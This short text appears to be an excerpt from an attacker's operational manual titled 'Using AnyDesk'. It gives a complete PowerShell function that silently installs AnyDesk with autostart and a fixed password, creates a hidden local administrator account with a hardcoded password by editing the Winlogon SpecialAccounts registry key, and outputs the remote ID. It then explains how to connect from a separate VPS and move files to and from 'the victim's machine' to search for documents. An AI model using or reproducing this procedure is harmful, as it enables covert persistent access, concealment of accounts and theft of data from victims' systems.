Using AnyDesk
Read all: `Function AnyDesk { mkdir "C:\ProgramData\AnyDesk " # Download AnyDesk $clnt = new-object System.Net.WebClient $url = "http://download.anydesk.com/AnyDesk .exe" $file = "C:\ProgramData\AnyDesk.exe" $clnt.DownloadFile($url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password net user oldadministrator "qc69t4B#Z0kE3" /add net localgroup Administrators oldadministrator /ADD reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id }`
AnyDesk Execute the code in Powershell ISE Run As Admin At the output we get the ID Save it to ourselves On a separate dedicated\vps\virtual machine, download Anydesk, specify the ID, Click Console Account, Enter the password to Quote J9kzQ2Y0qO, and then log in as a local admin or domain account and use the beauty of Anydesk. You can also download \ upload to \ from the victim's machine, which is convenient in the inspection and search for documentation point-by-point.


